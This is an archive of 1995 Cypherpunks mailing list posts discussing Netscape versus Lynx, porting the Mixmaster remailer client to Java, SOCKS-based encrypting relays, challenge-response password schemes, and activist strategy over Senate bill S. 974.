(or copyleft) crypto app.  Better would be to just write the app for the  
target platform or write it using an environment that is designed to be  
platform independant (like Java).


andrew
...able to work cypherpunks relevance into virtually any thread......and uses  
Python instead of NeXTSTEP when writing stuff that needs to be  
platform-independant...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Fri, 21 Jul 95 18:04:27 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Louie Freeh
In-Reply-To: <Pine.SUN.3.91.950721154444.14473B-100000@rwd.goucher.edu>
Message-ID: <Pine.3.89.9507211856.E26107-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Jon Lasser wrote:

> Having experience using American Spectator as a source for research 
> papers, I can state without any doubt in my mind that anything I read in 
> AS I attempt to find proof of their claims somewhere else.

That's a good policy, regardless of the source.  Respectable journalists 
just don't trust only one source - they find collboration from good, 
reliable sources.  Too bad most journalists have no idea what 
"respectable" and "professional" mean anymore.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Fri, 21 Jul 95 18:05:06 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Java (was Netscape: the big win)
In-Reply-To: <9507212034.AA00995@ch1d157nwk>
Message-ID: <Pine.3.89.9507211802.F26107-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Andrew Loewenstern wrote:

> If a Mixmaster client were available in Java (and I'm pretty sure it can be  
> done) then suddenly everyone who previously could only use the penet server  
> can now also use Mixmaster.  With more people using the remailer network, all  
> of them with Java clients, the possibility of for-pay remailers could become  
> reality (no promises that you'll get rich though).

The problem, Java only runs on a pretty restricted set of software.  I 
don't have to be running Solaris to take advantage of penet.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com
Date: Fri, 21 Jul 95 19:17:22 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <199507211829.OAA08315@bb.hks.net>
Message-ID: <Pine.3.89.9507211942.A7260-0100000@ccnet3>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Lucky Green wrote:
> Once someone tries Anarchie for ftp, or one of the enhanced (current
> leader seems to be Y.A.) Newswatchers for USENET, there is no going back
> to just Netscape. 
	In my own experience, the Mac newsreaders that I have 
tried(mainly Nuntius and Newswatcher) have felt incredibly slow compared 
to tin. What, IMHO, would be a good step forward would be Mac versions of 
UNIX packages like pine and tin...preferably with AppleScripts that 
implement the same functionality as the PineSign and TinSign scripts 
recently distributed here. I don't know about the Netscape-addicted 
masses, but it would make my life a lot easier. :-)

David Molnar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 19:47:42 PDT
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Netscape the Big Win(dows)
Message-ID: <v01520d00ac36215c73b5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:47 7/21/95, Damaged Justice wrote:
>Au contraire. I finally got the chance to use Netscape, and although I AM
>impressed, I still prefer Lynx. Most folks will probably call this pointless
>stubborness, elitism, I don't care. Graphics are too damn slow at any
>speed and personally, I have no need (or desire) to have my net connection
>slow to a snail's crawl just to make it "look nicer".

Ever tried turining off "autoload immages"?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 19:47:47 PDT
To: bigdaddy@ccnet.com
Subject: Re: Netscape the Big Win(dows)
Message-ID: <v01520d01ac3621ac8676@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:15 7/21/95, bigdaddy@ccnet.com wrote:

>        In my own experience, the Mac newsreaders that I have
>tried(mainly Nuntius and Newswatcher) have felt incredibly slow compared
>to tin.

Depends on the load on the host, the speed of your link, the speed of your
Mac, and if you want to trade features for speed at that given moment.

>What, IMHO, would be a good step forward would be Mac versions of
>UNIX packages like pine and tin...

The human interface is the whole point behind Newswatcher and Nuntius. As
for Mac users that prefer tin, they already have an implementation
available. It is called telnet.

>preferably with AppleScripts that
>implement the same functionality as the PineSign and TinSign scripts
>recently distributed here.

I have been thinking about writing AppleScripts that link Newswatcher with
PGP. Unfortunately, there is another project that has precedence. Still, as
with most great utility software not yet available, you can always try to
write it yourself.

Have fun,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 20:26:55 PDT
To: Chris Gorsuch <cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507220323.UAA04489@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:17 PM 7/21/95 -0500, Chris Gorsuch wrote:
  [ stuff about keeping a dictionary of previously used passwords to prevent
reuse ]
>   A "cryptographic" solution would be to simply store a hash of the password
>rather than the password itself in the "appended" dictionary.  A CRYPTOGRAPHIC
>solution would be to use one time passwords :).

Be _very_ careful if you try this.  After all, it's an invitation for anybody
who runs the dictionary to use a crack program on the convenient list of hashes.
(If you use the same hash as the password file, you haven't risked _too_ much,
but using something fast like MD5 invites people to use their pre-computed
"MD5's of a million wimpy passwords" list.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.net>
Date: Fri, 21 Jul 95 05:48:05 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201453.HAA19510@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.950721195913.32735G-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 20 Jul 1995, Hal wrote:

> Note though that neither SSL or SHTTP requires that the certificates come
> from RSA.  However the current versions of Netscape's browser do require this.
> This has been the source of much complaint and Netscape has promised that
> they will have some mechanism in the future to allow the user to
> choose his certificate signers.  I am not sure how far RSA will let them
> off the leash, though.

We may bypass them altogether (see below).

> Back to Perry:
> 
> >Netscape is a closed system. You can't write code for it unless you
> >work for Netscape.
> 
> That is why I am working on the proxy approach.  Any browser should be
> able to use enhancements supplied in this way.  Netscape is the big name
> this year, who knows who it will be next year.  As long as IP
> connectivity is available a proxy can get into the stream and apply
> enhancements.

I still maintain that an approach based on SOCKS would be more flexible, 
adaptable to any TCP-based application. Here's what I'm thinking about:

1. Windows apps: a general purpose socksifier, intercepting Winsock API
calls by *unmodified* applications and opening a single TCP connection to 
the port 1080 of a sockd server. The good news is: some good folks at NEC 
are already working at this project, and are looking for beta-testers.

2. A "SOCKS en/decrypting relay": a sockd server that, on a 
per-site/per-port basis depending on a configuration file, may either 
 a) open TCP connections on behalf of its clients; 
 b) relay a plain SOCKS connection to a remote peer;
 c) open a SSL connection to a remote peer on, say, a port 1180 reserved
    for "SSL-ized SOCKS" connections)
Of course, that beast should also listen at the ports 1080 and 1180 and 
take the same actions a) b) or c) as appropriate.

The SOCKS en/decrypting relay could be written both as MS-Windows DLL and as 
UNIX daemon. The chain would be:

- From a Windows client machine:

 Standard app -> Socksifier DLL by NEC -> encrypting relay -----> 
  ---> Internet -----> decrypting relay -> server

- From a Unix client machine:

 Socksified (recompiled) app -> encrypting relay ------>
  ---> Internet -----> decrypting relay -> server

I'm assuming here that the encrypting relay should live close to machine
(the same, or, at least on the same network) as the client app, and the
decrypting relay close to the server. A single daemon could do both jobs, 
allowing chaining "a` la remailer", but I'm using here two different 
names for sake of clarity. Besides, the Windows version probably wouldn't 
need decrypting ability.

Great advantage over Netscape: we could use EAY's free SSL implementation,
and all the server administrators could generate and sign their own
certificates. The present trouble with Netscape is that NS-Navigator
refuses to accept certificates not signed as "Netscape compatible". Our
en/decrypting relay could be more forgiving :-) As the SSL stuff built in
Netscape would be unused, we could also improve the protocol (plugging
security holes) ignoring compatibility issues. The administrators of
secure servers should just advise the users to configure their local
encrypting relays to pass through their decrypting relay (that would boil
down to a line added to the encrypting relay configuration). 

It would all be beautifully modular, relatively simple to code (as someone
else has done, or is doing, most of the hard work) and independent from
big-brother certifying authorities. 

Comments?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 21 Jul 95 18:42:27 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <199507211829.OAA08315@bb.hks.net>
Message-ID: <199507220147.VAA13565@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

> I remeber writing here once that after someone tries surfing the Web with
> Mosaic, there is no going back to just using lynx. The same holds true for
> Anarchie, Newswatcher, Eudora -- and Netscape.

Au contraire. I finally got the chance to use Netscape, and although I AM
impressed, I still prefer Lynx. Most folks will probably call this pointless
stubborness, elitism, I don't care. Graphics are too damn slow at any
speed and personally, I have no need (or desire) to have my net connection
slow to a snail's crawl just to make it "look nicer". 

Text mode looks just fine to me. It's the content that matters.

-- 

 http://yakko.cs.wmich.edu/~frogfarm      |          PGP signed mail preferred
"On a superhighway existing roads are destroyed, it's easy to monitor traffic,
you can't make your on-ramp, politics controls development and they arrest you
if you go too fast, travel in your own direction or use unapproved technology."
 - kpc@ptolemy.arc.nasa.gov               |              Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Fri, 21 Jul 95 19:53:07 PDT
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <199507220147.VAA13565@yakko.cs.wmich.edu>
Message-ID: <Pine.SUN.3.91.950721215547.667E-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Damaged Justice wrote:

> Lucky Green writes:
> 
> > I remeber writing here once that after someone tries surfing the Web with
> > Mosaic, there is no going back to just using lynx. The same holds true for
> > Anarchie, Newswatcher, Eudora -- and Netscape.
> 
> Au contraire. I finally got the chance to use Netscape, and although I AM
> impressed, I still prefer Lynx. Most folks will probably call this pointless
> stubborness, elitism, I don't care. Graphics are too damn slow at any
> speed and personally, I have no need (or desire) to have my net connection
> slow to a snail's crawl just to make it "look nicer". 
> 
> Text mode looks just fine to me. It's the content that matters.
 
Ever heard the old adage "a picture is worth a thousand words" 8-)

-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 21 Jul 95 19:05:17 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java (was Netscape: the big win)
In-Reply-To: <Pine.3.89.9507211802.F26107-0100000@khijol>
Message-ID: <9507220205.AA19644@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I've cc:ed this to the Mixmaster development list --Futplex]

Andrew Loewenstern writes:
> If a Mixmaster client were available in Java (and I'm pretty sure it can be  
> done) then suddenly everyone who previously could only use the penet server  
> can now also use Mixmaster.  With more people using the remailer network, 
> all of them with Java clients, the possibility of for-pay remailers could
> become reality (no promises that you'll get rich though).

Ed Carp writes:
# The problem, Java only runs on a pretty restricted set of software.  I 
# don't have to be running Solaris to take advantage of penet.

True, but an important part of the promise of Java is that many people are
AFAIK actively working on porting it to most major platforms. Right now it
apparently runs only on Solaris 2.3+ and Win NT 3.5. However, Sun is working
on porting it to Win `95 and Mac System 7.5. I assume other people are
trying to port it to other Unices. I recognize that this is RSN again, but
I believe there is reason for optimism in this case.

I'm getting extremely interested in porting the Mixmaster client to Java.
Doug Barnes' enthusiasm at the last BA phys. mtg. has proven infectious,
with a delayed reaction in my case ;).  I plan to say more about this
notion on mix-l within the next few days.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 21 Jul 95 22:29:51 PDT
To: cypherpunks@toad.com
Subject: Free Java courses in CA
Message-ID: <v02120d18ac364a63878d@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


[[ This is another reason why I think Java is worth looking into --
   on one hand, there will always be free tools available, in addition
   to commercial tools; on the other hand, it is being strongly
   supported by SUN ]]


The SUN Sacramento Training Center announces the following FREE courses.

The Java Programming Series: #1 An Overview of the Java Language
The Java Programming Series: #2 Accessing Data Files
The Java Programming Series: #3 Simple GUI Applications
The Java Programming Series: #4 Program-to-Program Communication
The Java Programming Series: #5 Applets Design and Implementation
The Java Programming Series: #6 Accessing an Oracle RDBMS

Each course is:
  - 2 hours in length (they always start at 9:00 AM on Fridays)
  - fast paced
  - an introduction to the course topic
  - FREE

It is assumed that each student:
  - knows C and/or C++ language syntax
  - has a basic understanding of object oriented programming
  - has a personality that enjoys taking a jump-start course and then
    learning the rest of the technology via projects, newsgroups, and
    email-alias discussions.


You should NOT attend this class if:

  You are a techno-weenie.

  You are already an experienced JAVA programmer.


Instructor: Matthew Calame

--------------------------------------------------------------------

A DRESS CODE is REQUIRED of all students.

Dress Code: Traditional Silicon Valley casual attire
            (blue jeans and company tee-shirt)



--------------------------------------------------------------------

Current Schedule:

08/04/95  The Java Programming Series: #1 An Overview of the Java Language
08/18/95  The Java Programming Series: #2 Accessing Data Files
09/22/95  The Java Programming Series: #3 Simple GUI Applications
10/06/95  The Java Programming Series: #4 Program-to-Program Communication
10/20/95  The Java Programming Series: #5 Applets Design and Implementation
11/03/95  The Java Programming Series: #6 Accessing an Oracle RDBMS

Note: If your group needs training at a different location or at different
times, please contact matthew.calame@west.sun.com.

--------------------------------------------------------------------

Courses will be held at:

  Sun Microsystems
  8880 Cal Center Drive
  Suite 200
  Sacramento, CA 95826

--------------------------------------------------------------------
To Enroll:

  (1) Send an email to:

        java-training@sacto.west.sun.com

      The email should contain your:

        Name:
        Company Name:
        Mailing Address:
        Telephone Number:
        Fax Number:
        Email Address:

  **OR**

  (2) Send a fax to:

        916-362-3287
        Attn: Matthew Calame

      The fax should contain your:

        Name:
        Company Name:
        Mailing Address:
        Telephone Number:
        Fax Number:
        Email Address:

--------------------------------------------------------------------




Regards,
Matt

----------------------------------------------------------------
                       Matthew B. Calame
                       Systems Engineer
             Sun Microsystems Computer Corporation

             Phone: 916-856-5507 or 916-856-5500
             Email: matthew.calame@West.Sun.COM
             Fax: 916-362-3287
             Sun Mailstop: USAC02
             Address:
               Sun Microsystems
               8880 Cal Center Drive
               Suite 200
               Sacramento, CA  95826
----------------------------------------------------------------

-
Note to Sun employees: this is an EXTERNAL mailing list!
Info: send 'help' to java-interest-request@java.sun.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 21 Jul 95 20:02:16 PDT
To: usura@replay.com (Alex de Joode)
Subject: Re: big word listing
In-Reply-To: <199507220006.AA27598@xs1.xs4all.nl>
Message-ID: <199507220301.XAA28535@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Is there a "challenge response" type of password/login available
| somewhere ?

	Theres S/Key, (also called OPIE), OTP from Avi Rubin at
Bellcore, and I think one or two others.  There are also hardware
solutions, sold by ANS, DEC, and others.

	If you want real in depth answers, try firewalls.
(majordomo@greatcircle.com)


Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 21 Jul 95 20:11:28 PDT
To: Alex de Joode <usura@replay.com>
Subject: Re: big word listing
Message-ID: <199507220309.XAA22246@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Alex sez:

> Is there a "challenge response" type of password/login available
> somewhere ?
> 

Post Office Protocol 3 (POP3) has an optional command called 
APOP which sends a string of the form "<process-ID.clock@hostname>".
The POP3 client calculates the MD5 digest of 
 
  <process-ID.clock@hostname>password

and sends it to the server as "APOP username 58349485whatever89583449".

I like it.

Regards,


--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 21 Jul 95 21:16:47 PDT
To: owner-cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <9507220416.AA27159@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>or set it as a variable and fork, or something like that.

Berkely-derived unices have a "ps" that can print the environment.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Shabbir J. Safdar" <shabbir@panix.com>
Date: Fri, 21 Jul 95 21:51:48 PDT
To: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <30106384.flight@flight.hrnowl.lonestar.org>
Message-ID: <199507220451.AAA25935@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



[From http://www.cnu.edu/~patrick/taoism/suntzu/suntx10.txt]

Sun Tzu?  SUN TZU you say?

>5. The general, unable to control his irritation,
>    will launch his men to the assault like swarming ants,
>    with the result that one-third of his men are slain,
>    while the town still remains untaken.  Such are the disastrous
>    effects of a siege.

Let's not lay siege to this bill prematurely.  Should we call grass roots
supports too early, people will become aggravated with being asked to
act on bills that aren't really a threat.

> 6. Therefore the skillful leader subdues the enemy's
>    troops without any fighting; he captures their cities
>    without laying siege to them; he overthrows their kingdom
>    without lengthy operations in the field.

Let's give the DC folks a chance to convince *those that control the
Congressional schedule* to keep this bill from going anywhere.

>17. Thus we may know that there are five essentials
>   for victory:
>   (1) He will win who knows when to fight and when
>       not to fight.

Now is not the time to fight this with "call in campaigns".  We haven't
even had time to digest the analyses.  Sure we understand the crypto part,
but should we call Grassley's office, you'll probably get back, "but there
are so many other holes in current law that this bill fixes, how can
you be opposed to it?"

Unaware of the rest of the bill, we'll be caught flat footed.

Look, every net-civlib group in DC is committed to the availability of
strong crypto.  There isn't a one of them who has ever ignored a fight
yet against crypto restrictions.  If several of them (who have really
good resources inside the capital, better than all of us) say that
the bill is NOT going anywhere, and that the best thing to do right now
is to study it and get ready in case it does move, what better
information do you have that convinces you that they're wrong?

We should read the bill, and we should be pissed.  But calling the wrath
of the net down on this bill is wasteful at this stage.  Sure it may get
thrown in as an amendment, that's always possible.  But if that's Grassley's
strategy, no amount of call-in support is going to help, because nobody,
not even that Senator you just called who promised you s/he opposes
AER will know what happened until it is too late.

Let's read the bill and get ready for a fight.  We should hold Grassley
accountable for this next election.  But we're spinning our wheels by
acting against every bill that affects one of our issues.

-Shabbir




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 21 Jul 95 17:23:47 PDT
To: cypherpunks@toad.com
Subject: Re: Phrack SummerCon - I enjoyed your talk
Message-ID: <199507220001.AA27218@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Owen Lynn sez:
: Eric,

: I was there in 'lanta when you gave your talk at SummerCon, and I
: thoroughly enjoyed it. I was especially intrigued by some of the, um,
: fun you can have with corporations. Are there any books I can read
: that are sort of _Fun with Your Corporation for Beginners_?

Corporation as in a Delaware "Inc" ? Are there transcripts of the
speach available ?

--
/ME							kewl as fuck !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 21 Jul 95 18:04:32 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507220006.AA27598@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jim Gillogly sez:

: Also you should be aware that cracking passwords is passe' these days:
: it's much easier to run an ethernet sniffer and gather them wholesale.
: Every little bit helps, though.

Is there a "challenge response" type of password/login available
somewhere ?

--
/ME							kewl as fuck !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 21 Jul 95 23:12:32 PDT
To: cypherpunks@toad.com
Subject: Re: It had to happen...
Message-ID: <v02130503ac363a5845f6@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 7/21/95, David Lesher wrote:
>Note that last I heard RM Sr. had retired & moved to New England.
>He is an interesting ....character... for lack of a better word.

I got that impression from the description in Cuckoo's Egg.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 21 Jul 95 20:50:25 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507212057.QAA15341@eff.org>
Message-ID: <30106384.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> We've not "bowed out" on this bill, it's just not significant enough a 
> threat (yet) to warrant stirring up a lot of activism about it - which 
> would detract from the focus on the CDA and it's clones.
> 
> We'll be tracking this bill and will certain help form a campaign against 
> it if it looks to be going anywhere. In the mean time, we're issuing an 
> analysis of it, and will keep the net informed.
> 

Sun Tzu in his classic _The Art of War_ says:

"Therefore those who win every battle are not really skillful--those
who render  others armies helpless without fighting are the best of
all.

The superior militarist strikes while schemes are being laid. The
next best is to attack alliances.  The next best is to attack the army."

"To unfailingly take what you attack, attack where there is no defense.
For unfailingly  secure defense, defend where there is no attack.

So in the case of those who are skilled in attack, their opponents do not
know where to defend. In the case of those skilled in the art of defense,
their opponents do not know where to attack."

"Be extremely subtle, even to the point of formlessness. Be extremely 
mysterious, even to the point of soundlessness. Thereby you can be 
the director of the opponent's fate.

To advance irresistibly, push through their gaps. To retreat elusively,
outspeed them."

I am afraid that if those who favor network freedom to not apply
Sun Tzu's principles we may be defeated. What are we doing to
"attack while the schemes are being laid?" If we were to provoke
opposition now in the beginning, it would create the impression
that if the bill were to become a threat, then there would be furious
opposition. We have a chance to win by indirection. But we are loosing
it by inaction. Sun Tzu recommends the use of spies, but because
the net civil liberties organizations are inactive, we are deprived of 
our spies. We do not even know which subcommittee it has been sent to.
We do not know which Senators we should direct the pressure to.

I am now making inquiries from here in Texas (through the offices
of the Texas Senators) as to what subcommittee. But it may take
a while. But this information should be easily available to organizations
like EFF and VTW. It should be in an action alert so that people like
me here in Texas do not have to search for it using non-optimal means.

If anybody knows which subcommittee the bill has been sent to, please
tell me.

-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sat, 22 Jul 95 01:01:59 PDT
To: hayden@krypton.mankato.msus.edu (Robert A. Hayden)
Subject: Three strikes you're out!  for politicians... yeah we wish!
In-Reply-To: <Pine.ULT.3.91.950721113352.5103A-100000@krypton.mankato.msus.edu>
Message-ID: <m0sZZTz-001Bg4C@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> 
> About two weeks ago, there was some talk in here with regards to holding 
> DC lawmakers crominally liable for passign bad laws.  This was followed 
> up with postins pointing out that you can't do that.

Here's something you *can* do:  

"Three strikes you're out" for politicians.

Any time the Supreme Court strikes down a law, any politician who has been 
found to have voted in favor of three such laws is immediately stripped of
all offices and rendered ineligible to run for public office ever again,
at any level.  (The same might apply to those found to have lied to a court

A politician who would trade citizen rights for political gain must be denied
the benefits of such a tradeoff.  This might prevent the rise of demagogues.
Term limits, etc., would of course help as well.  It would also give those
politicians who vote for 'motherhood' issues like 'protecting kids from the
perverts on the Internet' a good reason to think twice about the real issue.
If they REALLY believe they are protecting someone, they will still vote in
favor.  If they are going with the flow to avoid criticism, they'll lose in
the end.

My reasoning is that any politician whose laws are consistently struck down
should be deemed to lack a fundamental understanding of the rights of the
citizens of his/her country or jurisdiction.  They are thus a poor guardian
of those rights.

You heard it here first.
 
Craig Hubley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 22 Jul 95 06:05:52 PDT
To: cypherpunks@toad.com
Subject: An idea about Java and remailer clients and servers...
Message-ID: <199507221301.AA27475@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I think someone mentioned the possibility of running a Mixmaster
client in Java.

I was under the impression that there was a lot of common code
between the Mixmaster client and server versions, at least in
the current version.

Does it have to be the case, then, that we even have separate client
and server versions? If a new program is going to be written in Java,
can't it have the functionality of both client and server?

Why not "charge" for the ability to send an anonymous message with
the duty to have for a short time (maybe an hour or two) running on
your machine a node in a remailer network?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com
Date: Sat, 22 Jul 95 09:54:08 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <v01520d01ac3621ac8676@[192.0.2.1]>
Message-ID: <Pine.3.89.9507220907.A2360-0100000@ccnet3>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Lucky Green wrote:

> At 19:15 7/21/95, bigdaddy@ccnet.com wrote:
> Depends on the load on the host, the speed of your link, the speed of your
> Mac, and if you want to trade features for speed at that given moment.
	It's more from the graphical interface than anything else, or has 
been. My Mac is a 25 MHz 040...not that fast these days, but pretty good. 
I simply miss being able to tab through my news.

> The human interface is the whole point behind Newswatcher and Nuntius. As
> for Mac users that prefer tin, they already have an implementation
> available. It is called telnet.
	Unfortunately, with telnet(and yes, I do use this extensively), 
one is hobbled by the fact that the tin program resides on the other side 
of the link. In most cases, the link itself, and the machine it connects 
to, are insecure. This means that one cannot easily use PGP to auto-sign 
messages without keeping the key and a copy of PGP on the remote server.

One can, of course, pre-compose the message, sign/encrypt it, and then 
upload it, but that is a great deal of work compared to simply using TinSign.
It also works against the spontaneous nature of news(for me, at least). 
When was the last time you went to a newsgroup knowing everything you 
would say in advance?

> I have been thinking about writing AppleScripts that link Newswatcher with
> PGP. Unfortunately, there is another project that has precedence. Still, as
> with most great utility software not yet available, you can always try to
> write it yourself.
	I'm in the sixth week of my first programming class...as if that 
means anything. :-) I see your point, 'cypherpunks write code' and all. 
Simply wishing that I could run tin (relatively) securely on my Mac w/out 
needing to install FreeBSD or Linux(which I want to do, anyway).

David Molnar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Sat, 22 Jul 95 07:41:30 PDT
To: stewarts@ix.netcom.com
Subject: Re: Government Mandated Keys
Message-ID: <199507221441.AA32224@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jul 1995 11:39:07 -0700 you wrote:

>At 11:02 AM 7/19/95 PDT, rick hoselton wrote:
>>I want to register the 1-bit key of "1".  I expect to 
>>send about half my message bits encrypted, the rest will be clear-text.
>
>Oh, go ahead, register 0 also.  You'll probably want to switch keys
>occasionally during sessions.

Actually, why don't we just register our favorite geometric constant,
pi?  Assuming it's non-repeating, and non-terminating, you're
guaranteed that whatever key you end up using will be somewhere in pi.
						Dan
******************************************************************************
Vote Speaker Newt Gingrich for President!!                     Dan Bailey
